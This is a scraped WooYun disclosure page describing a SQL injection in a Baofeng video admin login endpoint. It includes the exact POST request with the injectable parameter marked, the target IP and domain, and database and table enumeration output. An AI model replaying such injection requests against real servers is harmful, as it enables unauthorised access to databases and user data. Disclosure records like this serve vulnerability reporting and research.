暴风影音某后台存在MySQL注射 | wooyun-2015-0154135| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154135

漏洞标题：暴风影音某后台存在MySQL注射

漏洞作者：路人甲

提交时间：2015-11-19 10:06

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-19：细节已通知厂商并且等待厂商处理中
2015-11-19：厂商已经确认，细节仅向厂商公开
2015-11-29：细节向核心白帽子及相关领域专家公开
2015-12-09：细节向普通白帽子公开
2015-12-19：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

暴风影音某后台存在MySQL注射

详细说明：

注射点：

POST /admin/gotologin.box HTTP/1.1
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://119.188.72.165/admin/gotologin.box
Cookie: JSESSIONID=BFBEE7294E7CABA0996D1B95435100FB
Host: 119.188.72.165
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
userBean.name=test*&userBean.password=test

119.188.72.165 对应的域名是　　tuijian.v.baofeng.com

漏洞证明：

current user:    'dev@%'
current database:    'ylbdsystem'
available databases [4]:
[*] information_schema
[*] mysql
[*] test
[*] ylbdsystem

Database: ylbdsystem
[35 tables]
+---------------------------+
| BD_active_partner_newlost |
| MonthReport               |
| module                    |
| user                      |
| affiche                   |
| banding_log               |
| bandingtj                 |
| bao3Active                |
| bd_active_partner         |
| bdcode                    |
| bdproject                 |
| bfnewlost                 |
| city                      |
| cpproject                 |
| dayReport                 |
| ditchManage               |
| ditchManageLog            |
| ditchManage_copy20130925  |
| email                     |
| login_record              |
| module_role               |
| role                      |
| sfnewlost                 |
| softlink                  |
| software                  |
| software_20130321         |
| software_type             |
| software_type_20130321    |
| tbanding                  |
| tjtable                   |
| user_role                 |
| v_ditchManage             |
| v_ditchManage2            |
| vvnewlost                 |
| xsproject                 |
+---------------------------+

时间盲注，不猜用户密码了，比较费时。

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-11-19 17:11

厂商回复：

感谢您提交的漏洞，我们会尽快修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154135

漏洞标题：暴风影音某后台存在MySQL注射

相关厂商：暴风影音

漏洞作者：路人甲

提交时间：2015-11-19 10:06

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154135

漏洞标题：暴风影音某后台存在MySQL注射

相关厂商：暴风影音

漏洞作者： 路人甲

提交时间：2015-11-19 10:06

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154135"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云